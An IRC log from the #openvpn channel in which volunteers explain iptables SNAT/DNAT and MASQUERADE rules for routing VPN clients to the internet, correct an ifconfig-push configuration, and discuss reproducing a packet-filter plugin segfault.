09:55 <@dazo> latenite: it's possible to do so too ... but it may cause you extra challenges when starting to do the routing .... using rfc1918 for VPNs is *the* recommended way
09:56 <@dazo> latenite: if you want your clients to have static public IP addresses when surfing the net ... I'd probably rather recommend doing NAT on the VPN server side
09:56 < latenite> dazo, but then my clients would get rfc1918 IPs. How would they get to use the internet?
09:56 <@dazo> latenite: NAT
09:57 < pulz> MacGyver: based on http://openvpn.net/index.php/open-source/documentation/howto.html#policy it should use 2 sequential ips?
09:57 <@vpnHelper> Title: HOWTO (at openvpn.net)
09:57 < latenite> dazo, But I can only DNAT one client then. Right?
09:57 < MacGyver> pulz: They don't have to be sequential, but you cannot use the all-zeroes address.
09:57 < MacGyver> pulz: 10.8.0.1 would be fine, probably.
09:58 < latenite> dazo, I talked about that to "pakster" the other day. He really helped me a lot on getting started with openvpn
09:58 < pulz> what is the second ip address? the first one is the ip address the client gets assigned?
09:58 < latenite> he recommended not to use NAT but rather have public IPs
09:58 <@dazo> latenite: you do that on the server side, and ignore what the clients have/use ... as you can't ever trust clients to do the right thing ... you primarily control the server
09:59 <@dazo> (nitpick ... you can only control the client 100% if it is your own workstation/laptop/whatever, which you use every day ... if others start the VPN connection, even through an automatic boot script, you can't fully trust the client)
09:59 < latenite> dazo, sorry? What exactly do I do on the server side?
09:59 <@dazo> latenite: the NAT
10:00 < latenite> dazo, oh sure I do the DNAT on the server side. But I was told and still believe that this **only** works for one client at once
10:01 <@dazo> latenite: not necessarily ... you need SNAT on the server side too, I'd presume
10:01 < latenite> Internet -> VPN-server -> DNAT -> client(s)
10:01 < latenite> but no plural for "client(s)"
10:01 <@dazo> And: client(s) -> VPN-server -> SNAT -> Internet
10:02 < MacGyver> pulz: Oh, my mistake, just a second.
10:03 < latenite> dazo, could you help me setting that up? I have the server up and running. I am just unsure on how (and which) IPs to push to the clients. So the clients can use the VPN connection to get online freely
10:03 <@dazo> latenite: so you need in PREROUTING DNAT rules which map the public IP addresses of your clients to their VPN IP addresses ... and then POSTROUTING SNAT which maps the VPN IP address to their public IP address
10:03 <@dazo> latenite: and then you just use plain rfc1918 addresses on the VPN tunnel
10:04 < MacGyver> pulz: Sorry, I had things mixed up with ifconfig there. Assuming ipconfig-push is analogous to ifconfig-push, the first address is the address that gets assigned, the second should be the netmask, not an address.
10:04 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn
10:04 < MacGyver> pulz: 10.8.0.0 is not a netmask. 255.255.0.0, e.g., is.
10:05 < latenite> dazo, would you know a tutorial or wiki on that? I am totally new and super lost when it comes to setting up these rules.
10:05 <@dazo> iptables -t nat -I PREROUTING -i eth0 -d $PublicIP --to-destination $VPNIP
10:05 <@dazo> iptables -t nat -I POSTROUTING -i tun0 -d $VPNIP --to-destination $PublicIP
10:05 < pulz> MacGyver: are you sure? ref this http://openvpn.net/index.php/open-source/documentation/howto.html#policy
10:05 <@vpnHelper> Title: HOWTO (at openvpn.net)
10:06 <@dazo> pulz: 10.8.0.0 netmask 255.255.255.0 ..... here 10.8.0.0 is a network address ... and 10.8.0.1 is the first host address
10:06 <@dazo> !tcpip
10:06 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know
10:06 <@ecrist> that's a nice link, dazo
10:07 < MacGyver> pulz: I'm 99% sure.
10:07 < MacGyver> pulz: I'm getting it from the openvpn manpage. The way I see it, there's two possibilities:
10:07 <@dazo> ecrist: thx! :)
10:08 < MacGyver> -Either the manpage is right, and that howto-link is wrong, in which case you should be using the netmask, or:
10:08 < MacGyver> -The manpage is wrong (or I'm interpreting it wrong), in which case you should be using a valid IP-address.
10:08 < latenite> dazo, are these the only two lines I need? Where do I put them to try it out?
10:08 < MacGyver> Either way, 10.8.0.0 is *not* a valid entry for the second argument to ipconfig-push
10:08 <@dazo> pulz: Both is right ... 10.8.0.0/24 means the 10.8.0.0 subnet ... where .0 is the network address and .1 is the first host address
10:09 <@dazo> MacGyver: ^^
10:09 < pulz> since i add this as client override, should the openvpn push this config to client?
10:09 < pulz> without touching client configs?
10:09 <@dazo> pulz: MacGyver: The wiki/howto says "Virtual IP Range" and "subnet"
10:10 <@dazo> which means exactly what I've said twice now :)
10:10 <@dazo> latenite: if you have rfc1918 addresses, then yes ... that should be it
10:10 < MacGyver> dazo: Then my manpage is incomplete, I guess.
10:10 <@dazo> latenite: but that maps all port ranges ... you may consider to only allow this for a limited set of ports, though ... but that's kind of hardening this setup
10:11 <@dazo> MacGyver: which section do you look at?
10:11 <@dazo> (afair, the man page is quite correct on terminologies)
10:11 < pulz> it seems like there are 2 possible ways to set this in pfsense 2.x ref https://dl.dropbox.com/u/19352103/ovpn-static.PNG
10:11 < pulz> or am i completely wrong?
10:12 < pulz> and yes i know that the ips are different, just entered data for screenshot
10:12 <@dazo> pulz: 10.0.8.240/30 ... that gives you a small subnet with only 4 IP addresses .... 10.0.8.240 is the network address, 10.0.8.241 is the first host address, 10.0.8.242 is the second IP address and 10.0.8.243 is the broadcast address
10:13 < latenite> dazo, How do I do it? How/where do I put these lines?
10:13 <@dazo> latenite: that's command line stuff ... this isn't strictly openvpn ... that's iptables setup
10:13 < MacGyver> dazo: Yeah, it appears you're right. I think I'm being confused by the manpage listing --ifconfig l rn, then explaining that rn can stand for an address in the case of tun, or a netmask in the case of tap, and --ifconfig-push *not* making that distinction as well as expanding rn to remote-netmask.
10:14 < pulz> dazo: you're correct, i misread what the tunnel network option is for
10:15 -!- mattock_afk is now known as mattock
10:15 < MacGyver> I didn't check back with --ifconfig when I was reading --ifconfig-push, so I took address-netmask literally as netmask.
10:15 -!- raidz_away is now known as raidz
10:15 < kjs> Guys ecrist http://fpaste.org/RRTO/ serverside log
10:15 <@dazo> MacGyver: yeah ... --ifconfig can be confusing .... depending on if you are in p2p mode, p2mp (--server), if it's tun or tap mode and --topology setting as well
10:15 < latenite> dazo, so on the VM that runs openvpn all I do is: iptables -t nat -I PREROUTING -i eth0 -d 5.9.243.146 --to-destination *WHAT GOES HERE? * ?
10:15 <@dazo> MacGyver: depending on these combos ... the --ifconfig syntax may differ
10:15 <@dazo> latenite: the IP address of your VPN client
10:16 <@dazo> the VPN IP address given out by OpenVPN to your VPN client
10:16 < pulz> so using my first value actually should work? "ipconfig-push 10.0.8.249 10.0.8.0"; ;
10:16 < kjs> does the CN on the certs have to be the same on each side?
10:16 < pulz> without the double ; of course
10:16 < latenite> dazo, so that actually has to happen dynamically? Since I will have multiple clients
10:17 <@dazo> latenite: or you can just have static mapping ... that VPN IP address .1 always gets mapped to 5.9.243.146 .... .2 always gets 5.9.243.147 ... and so on
10:18 <@dazo> latenite: which distro do you use?
10:19 < latenite> dazo, gentoo
10:19 < MacGyver> pulz: No. Like I said, the .0-address is not valid there, in either case. You cannot assign the network address, which is the first address in a subnet, to a client.
10:20 < latenite> dazo, now I am confused. Since 5.9.243.146 is not rfc1918 as you recommended it to be
10:20 <@dazo> latenite: okay ... then remember to save your iptables setup before you boot .... /etc/init.d/iptables save ... iirc .... or hack on /var/lib/iptables/rules-save ... or whatever it was again
10:20 < MacGyver> pulz: If you're using routing mode, you *must* specify a valid address.
10:20 < pulz> so 2 successive ips are the correct? from what i can find from googling at least?
10:20 < MacGyver> pulz: They don't have to be successive. They only have to be in the same subnet *and valid host addresses for that subnet*.
10:21 < latenite> iptables -t nat -I PREROUTING -i eth0 -d 5.9.243.146 --to-destination 5.9.243.146 OR 10.8.0.2 ?
10:21 < latenite> dazo, ^
10:21 < pulz> MacGyver: but the problem is that nothing gets pushed anyway
10:21 < pulz> from pfsense that is
10:21 < MacGyver> pulz: Successive IP's will most likely satisfy that requirement, yes, but if your subnet is 10.8.0.0/24, then using 10.8.0.1 and 10.8.0.240 is fine.
10:22 < MacGyver> pulz: More likely is that you're not seeing it getting pushed because it's not a valid address to push.
10:22 <@dazo> latenite: what these SNAT/DNAT rules do is to provide a public IP address for your VPN clients .... so that if you have a client 10.8.0.2 mapped to 5.9.243.146 (DNAT/SNAT rules) ... whenever that client surfs the net over the VPN ... its public IP will be 5.9.243.146 .... and when stuff on the Internet talks with your VPN client ... it will talk to the public 5.9.243.146 IP ... then your OpenVPN server's iptables setup changes that to the 10.8.0.2 address before sending the traffic through the tunnel
10:23 < pulz> MacGyver: the dhcp pool is 10.0.8.x, so im testing "ipconfig-push 10.0.8.249 10.0.8.250";
10:23 < MacGyver> pulz: Ah, now *that* should work, yes.
10:23 <@dazo> DNAT/SNAT modifies the destination and source IP address ... and the iptables stuff keeps track of which internal IP address has which connections open
10:23 < pulz> MacGyver: but nothing happens :/
10:24 < pulz> i should see it from console right?
10:24 < latenite> dazo, ahhh I start to get it. So for starters: I did not buy the public IP block in vain?! right. I still need it?!
10:24 < pulz> so long as i don't daemonize it
10:25 < MacGyver> pulz: Tentative yes... But what are you and aren't you seeing? Can you pastebin your output somewhere?
10:25 <@dazo> latenite: iptables -t nat -I PREROUTING -i eth0 -d 5.9.243.146 -j DNAT --to-destination 10.8.0.2 <<<--- this tells that connections to 5.9.243.146 should go to 10.8.0.2 on your inside net
10:25 < latenite> dazo, it's just that I *ALSO* need SNAT/DNAT to map between the IPs? Did I get that right?!
10:26 <@dazo> latenite: iptables -t nat -I POSTROUTING -i tun0 -s 10.8.0.2 -j SNAT --to-source 5.9.243.146 <<<--- this tells that connections from 10.8.0.2 should use the public IP address 5.9.243.146
10:26 <@dazo> notice the changes between PRE/POST routing, -d and -s, DNAT and SNAT and the --to-destination vs --to-source
10:27 < latenite> dazo, yes :D kind of makes sense a little now.
10:27 < pulz> MacGyver: im guessing i should see a hint of pushing or error that my command is not correct http://pastebin.com/CeX5K2Uj
10:27 < latenite> dazo, For a minute I thought I could have done it without the public IPs. Can you confirm that this is not the case?!
10:28 <@dazo> latenite: depends on what your goal is
10:29 < latenite> dazo, my goal is for the client to connect to the OpenVPN and be able to use the internet on any ports
10:29 <@dazo> latenite: do you want your VPN clients to access services on the Internet via the VPN tunnel? If yes, then you need to use DNAT/SNAT or MASQUERADE (depending on if you want dedicated public IP addresses for each VPN client or if all can use the same public IP address) .... or if you just want VPN clients to only access an internal network
10:30 <@dazo> latenite: ahh, okay ... so for public Internet access, then you need either DNAT/SNAT *or* MASQUERADE ... depending on if you want separate public IPs for VPN clients or not
10:30 < latenite> dazo, I don't even have an internal network yet. It's just the bare host with the VM that runs openvpn.
10:31 <@dazo> well, internal network can just as well be services on the VPN server ... only accessible via the VPN
10:31 <@dazo> (but that's nitpicking again)
10:32 < latenite> dazo, I am not sure if I need them to have separate public IPs.. ?! I *only thought* it had to be like that.
10:33 < latenite> dazo, How would I reach the different clients from the outside world if they were only represented by a single IP?
10:33 <@dazo> then you can make it a lot easier, if you don't need separate IPs .... just ditch the SNAT/DNAT rules .... and use: iptables -I POSTROUTING -o eth0 -s 10.8.0.0/24 -j MASQUERADE
10:33 <@dazo> and that's it
10:33 < latenite> dazo, is there a downside to MASQUERADE?
10:34 <@dazo> latenite: you can't basically in a typical MASQUERADE setup ... you then need separate DNAT/SNAT rules in pairs
10:34 <@dazo> you can't access VPN clients from the outside using MASQ, that's what I tried to say :)
10:34 < MacGyver> pulz: That's the server output, right?
10:34 < MacGyver> pulz: Do you have client output as well?
10:35 <@dazo> latenite: so that's the "downside" ... depends on what you want to provide to your clients
10:35 < latenite> dazo, ohh ok. So DNAT/SNAT is what I really need
10:35 < MacGyver> pulz: And, perhaps, is the client using an ifconfig-directive?
10:35 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
10:35 <@dazo> latenite: read the DNAT and SNAT sections in the iptables man page carefully .... and you'll see how you can map this better
10:35 < latenite> dazo, I basically want my clients to be "free" servers on the internet to host services and be reachable
10:36 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
10:36 <@dazo> latenite: do you care about VPN client security? I mean, do you want to or need to firewall traffic hitting the VPN clients? Or are they "customers" which need to cover their own a**es?
10:37 < latenite> dazo, thank you tons for getting the basics to me. I am such a rookie when it comes to that sort of stuff :D
10:37 < pulz> MacGyver: that's client
10:37 <@dazo> latenite: if you need to care for the VPN client security .... then I'd add single PREROUTING/DNAT rules per port the clients use, and only forward those ports the clients use for public services
10:37 < latenite> dazo, second one. I don't care if they are exposed to the nastiness of the net
10:38 < MacGyver> dazo: That's unnecessarily complicating things.
10:38 < MacGyver> dazo: You don't *need* NAT to firewall those clients.
10:38 <@dazo> latenite: okay ... then not filtering is the proper way
10:38 < MacGyver> dazo: You can fix this with iptables on the server while still using public IP's.
10:38 <@dazo> MacGyver: I wear my tinfoil-hat everyday ... even sleep with it
10:39 < MacGyver> dazo: Then you should know that NAT adds *no* security.
10:39 * dazo is paranoid by nature when it comes to the Internet
10:39 < latenite> dazo, so that's protecting the (say httpd client) by filtering only 80,443 on the vpn side? Did I get that right!?
10:39 <@dazo> MacGyver: NAT is no security ... but not forwarding ports the VPN clients don't listen to or are supposed to be accessed on, reduces the VPN traffic and protects the VPN clients from those attempts
10:40 < latenite> dazo, this will be my first time setting up filter rules. And I have a general question before I start to read/play with iptables...
10:40 <@dazo> MacGyver: as those attempts will then hit the INPUT rule on the VPN server instead afterwards
10:40 < MacGyver> dazo: Yes, but my point is that latenite can perfectly use his external IP's on the client as long as he's got the iptables-firewall setup on the server.
10:40 < latenite> ...my VM is a LXC (linux container) which uses the host's kernel.
10:41 < MacGyver> dazo: You don't *have* to use MASQUERADE rules to have an effective block in iptables.
10:41 <@dazo> MacGyver: true 10:41 < MacGyver> To which I should add that iptables is a huge mindf*ck and I personally prefer to use a decent set of frontend-scripts like shorewall. 10:42 < pulz> MacGyver: i atleast managed to verify that the settings are applied, just tested for fun and its giving me 3 Options error: Unrecognized option or missing parameter(s) in [PUSH-OPTIONS]:10: ipconfig-push (2.2.1) 10:42 < latenite> ...so will my iptables setup in the VM(lxc) also effect the host? Since its the same kernel and iptables is kernel based? 10:42 <@dazo> nah ... iptables rules are easy :) 10:42 < MacGyver> pulz: Uhm. 10:42 < MacGyver> pulz: Shouldn't that be ifconfig-push, even though you might be on windows? 10:42 < latenite> Like what if I had 3 VMs with different iptables rules? Would that work? 10:43 < pulz> MacGyver: the client is running linux, so that might be the case 10:43 < MacGyver> dazo: Yes, they're easy, and easy to get wrong, but that's personal preference. 10:43 < MacGyver> latenite: Yes that would work. 10:43 < MacGyver> latenite: The way you would set this up... 10:44 <@dazo> MacGyver: yeah ... I've been doing firewalling with Linux since ipfwadm -> ipchains and then iptables .... so my brain is iptables native compatible :) 10:44 < latenite> dazo, :D great. 10:45 < latenite> ipfwadm -> I just had to google that :/ 10:45 <@dazo> latenite: don't ever bother about ipfwadm ... it disappeared with Linux 2.0 kernels 10:45 < MacGyver> latenite: You'd have your ISP routing that public subnet to you. I don't know if that's hooked directly to your VPN server, but for the sake of clarity I'll assume that subnet gets routed directly to the VPN server. Then, the VPN server is running iptables and drops *everything* directed at *everything*, except for a few rules of traffic directed at specific IP-addresses in the VPN-range for the host servers. 10:46 <@dazo> latenite: 2.2 kernels came with ipchains ... 
and 2.4 and further shipped iptables 10:46 < MacGyver> Then it routes that subnet onward into the actual VPN, with clients using the public subnet provided by the ISP. 10:46 < MacGyver> No NATting is done and it's just as secure. 10:49 < MacGyver> Of course, if you need more clients than your public subnet provides (it was a /29, right? So that's 6 usable addresses, unless my brain is screwing with me), then other options become interesting, such as using SNAT / DNAT for a subset of an internal RFC1918 network and MASQUERADE for the rest. 10:51 < latenite> MacGyver, dazo yes I need more than just one client. 10:51 < MacGyver> latenite: But do you need more than 6? 10:52 < latenite> MacGyver, maybe. 10:52 < latenite> If I could have some friend use the vpn to tunnel the campus wifi..that would be cool 10:53 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 10:53 <@dazo> and probably breaking some rules for the usage of the wifi net .... 10:54 < latenite> but for starters I'd be happy to have a working setup at . One that gets my laptop to use the internet through the vpn. So I am no longer imprisoned in that campus wifi that only allows port 80,443 10:54 -!- [Xaronic] [~Xaronic]@occupyuk.co.uk] has quit [Quit: Quit] 10:54 < latenite> dazo, I actually asked the IT helpcenter. They said it's ok for me to do 10:56 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 10:56 < latenite> ...so for starters I just read up on iptables now...to get me up to par to actually set up SNAT/DNAT 10:56 < latenite> dazo, MacGyver did you read my LXC vs. iptables question? 10:57 <@dazo> latenite: I don't have any hands-on experience with LXC ... but if I've understood it correctly, it should work just fine 10:57 < latenite> What if I have multiple LXCs with different iptables rules?
10:57 <@dazo> should be fine, as they are different containers 10:58 < latenite> dazo, ok so it's 3am and I have surf class in 5 hours. That's bad and cool at the same time :D 10:58 <@dazo> latenite: hopefully the water will be cold, so you'll wake up ;-) 10:58 < latenite> I'll go to bed and learn how to use iptables on the weekend 10:59 < latenite> dazo, they have sea fleas. nasty things. I did not even know such things exist until I came to australia :D 11:00 <@dazo> ugh 11:00 < latenite> they just itch. bad thing though....they get in *everywhere* :D 11:00 < latenite> you don't want to know :D 11:01 * dazo tries to think about something completely different now ..... :-P 11:01 < latenite> Still, me coming from a place where we don't surf ...it's good fun 11:02 < latenite> dazo, so thanks again. I now have a plan on what to do. 11:02 <@dazo> no worries! 11:02 < latenite> dazo, you wouldn't have a good link to get me started with iptables. Google is flooded, I know. But that makes it hard to pick the good stuff 11:03 <@dazo> latenite: I'd probably ask in #netfilter 11:03 <@dazo> for me the "easy stuff" is probably way too advanced for beginners 11:03 < latenite> dazo, #netfilter is the official iptables channel? 11:04 <@dazo> yeah 11:04 <@dazo> iptables is just the front-end to the kernel netfilter code 11:04 -!- AsadH is now known as zz_AsadH 11:04 <@dazo> or rather, one of the front-ends to netfilter 11:04 < latenite> 1st thing learned already :D 11:04 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco] 11:05 < latenite> cool then, that will be the first thing I'll do after lunch tomorrow. 11:05 <@dazo> latenite: this might be a good starter ...
http://www.linuxjournal.com/article/4815?page=0,1 11:05 <@vpnHelper> Title: Taming the Wild Netfilter | Linux Journal (at www.linuxjournal.com) 11:05 <@dazo> but that stuff is quite old these days 11:06 < latenite> y'all have a pleasant day 11:06 <@dazo> u2 11:06 < latenite> dazo, now that you linked that to me...I can't but read it as my night lecture :D 11:07 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 11:11 <@dazo> latenite: well, since you're still here ... this one looks a bit more comprehensive .... http://www.frozentux.net/iptables-tutorial/iptables-tutorial.html#IPFILTERING 11:11 <@vpnHelper> Title: Iptables Tutorial 1.2.2 (at www.frozentux.net) 11:11 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 11:12 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 256 seconds] 11:17 < latenite> dazo, thx :D more for the weekend 11:17 < latenite> dazo, so for starters I could just try to block pings, right?! 11:18 <@dazo> latenite: that's probably the safest place to start playing, esp if you don't have console access to the box not depending on ssh 11:25 < latenite> dazo, actually I have ssh access to the VMs. I am just scared of my initial idea of: rules affecting the host because I use LXC and not a real VM 11:26 <@dazo> latenite: that's what I meant ... you should see if you could have a different "backdoor" ... like a serial console via an admin page at your VM provider 11:26 <@dazo> the serial console will then be unrelated to the networking stuff ... so if you really mess it up, you can fix it via the serial console log-in 11:28 < latenite> dazo, I do. I have an RDP thing with external IP and also a way to reboot with a rescue system. So I should be fairly safe to make mistakes 11:28 <@dazo> ahh, good! 11:29 < latenite> ...I am not tired, but I'd hate myself if I don't sleep now. 11:29 < latenite> dazo, are you around on the weekend?
11:30 <@dazo> latenite: probably not ... but I'm quite sure #netfilter guys will be more than helpful 11:30 <@ecrist> wow, dazo being all helpful and such. this is an odd day 11:30 < latenite> dazo, cool then. I'll be around. I guess this vpn thing will keep me busy the next few days/weeks 11:31 * dazo slaps ecrist with a trout 11:31 <@dazo> ;-) 11:31 <@ecrist> THERE'S the dazo I know and love. 11:31 <@dazo> lol 11:34 < MacGyver> latenite: Regarding LXC with iptables: I prefer to set up iptables on the host only. 11:35 < MacGyver> latenite: But if that's not an option, my understanding is that it *should* work. 11:35 <@dazo> MacGyver: he's an LXC customer 11:35 -!- latenite [~latenite@138.77.121.79] has quit [Ping timeout: 260 seconds] 11:35 -!- latenite [~latenite@138.77.121.79] has joined #openvpn 11:36 < MacGyver> dazo: I also use LXC, I just prefer to set up iptables on the host only and route all traffic through that. 11:36 -!- Mcloven__ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 11:36 < MacGyver> dazo: But none of my containers run something like openVPN, i.e. none of my containers act as a router. 11:36 <@dazo> MacGyver: yeah, but if you buy a "VM" from a hosting provider giving you an LXC ... you probably won't be allowed to play with the host iptables rules 11:36 < MacGyver> Ah, right, "customer" like that. 11:37 < MacGyver> Yeah, I understand it should work. 11:37 < MacGyver> But I've never had to test it. 11:38 <@dazo> yeah, me neither ... well, I've seen demos of it, especially on Fedora 18 combined with systemd and SELinux containers ...
and that's pretty impressive 11:38 <@dazo> (Dan Walsh even "booted" up a Debian user space in such an LXC running on Fedora 18) 11:40 -!- latenite [~latenite@138.77.121.79] has quit [Ping timeout: 252 seconds] 11:41 -!- master_of_master [~master_of@p4FF24E11.dip.t-dialin.net] has joined #openvpn 11:41 -!- zach__ [~zach@nat-192-95-29-123.bhs1.montreal.qbc.ca.nuked.co] has joined #openvpn 11:42 -!- latenite [~latenite@138.77.121.79] has joined #openvpn 11:43 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has quit [Ping timeout: 248 seconds] 11:43 < latenite> dazo, MacGyver I am a "customer" to my own root-server that has LXCs. I could have gone for kvm also. 11:44 * dazo would have gone for the KVM solution, though 11:44 <@dazo> that gives you real root privileges 11:44 <@dazo> (on your VM, that is) 11:44 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 11:44 -!- mattock is now known as mattock_afk 11:45 -!- Netsplit *.net <-> *.split quits: master_o1_master, jave_, zach, Mcloven_ 11:48 -!- latenite [~latenite@138.77.121.79] has quit [Ping timeout: 252 seconds] 11:50 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 11:50 -!- latenite [~latenite@138.77.121.79] has joined #openvpn 11:51 < latenite> dazo, hmm I keep getting disconnected... 11:52 < latenite> sorry 11:52 < latenite> I'll just sleep now. 11:52 < latenite> later :D 11:52 -!- latenite [~latenite@138.77.121.79] has quit [Client Quit] 11:55 -!- Dennis84 [~dennis@mail.it-moebius.de] has joined #openvpn 11:55 < Dennis84> hi all 11:57 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:02 < Dennis84> can somebody tell me, if this patch is in the actual trunk for future stable versions?
12:02 < Dennis84> https://community.openvpn.net/openvpn/ticket/163#comment:4 12:02 <@vpnHelper> Title: #163 (Segfault in PF) – OpenVPN Community (at community.openvpn.net) 12:05 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn 12:08 <@dazo> Dennis84: it's not understood *why* that *pfs pointer is NULL ... so that needs to be understood before we can commit it 12:08 <@dazo> as stated in comment #2 .... 6 months ago .... and I've not seen any attempts to try to dig into that 12:09 <@dazo> I vaguely remember tracing the code paths manually ... and iirc, at that time I couldn't understand how *pfs could be NULL 12:15 < Dennis84> dazo: hm I understand that this is a workaround 12:15 < Dennis84> but isn't it better to have no crash with a workaround than to have a crash without? 12:15 <@dazo> Dennis84: yes, and we don't commit workarounds .... that doesn't really solve anything ... unfortunately, most of us who develop openvpn stuff now barely have time to scratch our own itches in OpenVPN ... 12:16 <@dazo> the worst thing which happens with workarounds is that, f.ex. a buffer overflow somewhere else gets hidden due to such fixes ... that can cause greater pains later on 12:16 <@dazo> So it is needed to fully understand why this unexpected scenario happens 12:16 -!- master_o1_master [~master_of@p4FF24C6C.dip.t-dialin.net] has joined #openvpn 12:17 <@dazo> otherwise a hidden buffer overflow may again later bite us back as a security issue 12:17 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has quit [Quit: Computer has gone to sleep.] 12:17 -!- master_of_master [~master_of@p4FF24E11.dip.t-dialin.net] has quit [Read error: Operation timed out] 12:17 <@dazo> So in that context ...
yes, a crash is better 12:18 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 264 seconds] 12:19 -!- catsup [~d@64.111.123.163] has joined #openvpn 12:19 < Dennis84> dazo: ok i understand 12:20 < Dennis84> i think you dont have time to solve such an issue, because there are other parts you have to work on 12:20 <@dazo> that's also true 12:20 < Dennis84> but is there a possibility, that this problem get fixed in a specific time? 12:20 < Dennis84> i know, that this is a very detailed problem 12:21 <@dazo> whenever someone comes up with a good thesis and a patch which covers that thesis 12:21 <@dazo> But if you want a specific time ... I'm sure we've solved this by the end of 2099 12:22 < Dennis84> ;) 12:22 < Dennis84> ok 12:22 < Dennis84> i dont want to be angry ;) 12:22 <@dazo> :) 12:22 < Dennis84> you all do a great work 12:22 < Dennis84> :) 12:25 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds] 12:25 < Wulf> Dennis84: do you suffer from that problem? 12:25 -!- catsup [~d@64.111.123.163] has joined #openvpn 12:28 < Wulf> Dennis84: if so, are you able to reproduce the problem? Can you provide detailed instructions so that someone else can also reproduce it? 12:31 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 12:32 -!- catsup [~d@64.111.123.163] has joined #openvpn 12:35 < Dennis84> Wulf: yes, i had this problem month ago and i can tell how to reproduce it 12:36 < Dennis84> i compiled openvpn with this patch, since this i have no errors 12:36 < Dennis84> or segfaults 12:36 < Wulf> Dennis84: okay. How? :) 12:38 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 12:38 -!- catsup [~d@64.111.123.163] has joined #openvpn 12:39 < Dennis84> Wulf: first you have to compile the plugin 12:39 < Dennis84> http://backreference.org/2010/06/18/openvpns-built-in-packet-filter/ 12:39 < Wulf> which one? 
12:39 < Dennis84> this is the howto I followed 12:40 < Dennis84> I don't know if it's a problem that you follow the howto 12:40 < Dennis84> and I give you my specific configs 12:41 < Wulf> Dennis84: how should I know if it's a problem? 12:42 < Dennis84> I don't know if you can follow the howto or if you want I tell you everything you have to do ;) 12:44 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 12:44 -!- catsup [~d@64.111.123.163] has joined #openvpn 12:45 < Wulf> Dennis84: okay, I compiled the plugin 12:47 < Dennis84> ok 12:48 < Dennis84> first you need a client-connect-script 12:48 < Wulf> Dennis84: can you make me a tarball of all required openvpn config? 12:48 < Wulf> scripts, etc 12:49 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 264 seconds] 12:50 < Dennis84> Wulf hmm I think it's easier to tell you 12:50 < Dennis84> because you have to define the settings for your specific clients 12:51 -!- catsup [~d@64.111.123.163] has joined #openvpn 12:51 < Dennis84> but I think I can tell in 5 minutes 12:51 < Wulf> okay...
12:51 < Dennis84> so, you have to create the client-connect script like mentioned in the howto 12:52 < pekster> If you attach all this info as another comment/attachment to the bug, it's likely to get more attention 12:53 < pekster> There are possibly developers interested (or who will eventually be interested) in fixing it that may not be in IRC right now, and a tarball + description on the bugreport is a more permanent way to describe a reproduction method 12:53 <@dazo> pekster++ 12:54 < Dennis84> ok 12:54 < Dennis84> I will try 12:57 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 12:57 -!- catsup [~d@64.111.123.163] has joined #openvpn 12:57 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 248 seconds] 13:03 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 276 seconds] 13:03 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:05 < Dennis84> Wulf: I attached the file 13:06 < Dennis84> you have to check 2 directories 13:06 < Wulf> Dennis84: thanks! 13:06 < Dennis84> allccd 13:06 < Dennis84> and pf 13:06 < Dennis84> in every directory you need a file which contains the client-cert name 13:07 < Dennis84> you see an example 13:07 < Dennis84> in every directory 13:07 < Dennis84> no Wulf 13:07 < Dennis84> I have to say thank you! 13:07 < Wulf> huh? 13:08 < Wulf> ah 13:08 < Wulf> what do you mean by "client-cert name"? 13:09 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 252 seconds] 13:09 < Dennis84> you can define special settings for every client 13:09 < Wulf> Dennis84: don't want to 13:09 < Dennis84> Wulf: yes, but you have to create a pf file for every client 13:10 < Wulf> Dennis84: can you not include that? 13:10 < Dennis84> Wulf: I don't know your client-cert names? ;) 13:10 -!- catsup [~d@64.111.123.163] has joined #openvpn 13:10 < Wulf> Dennis84: I don't have any 13:10 < Dennis84> what? how do your clients connect and auth?
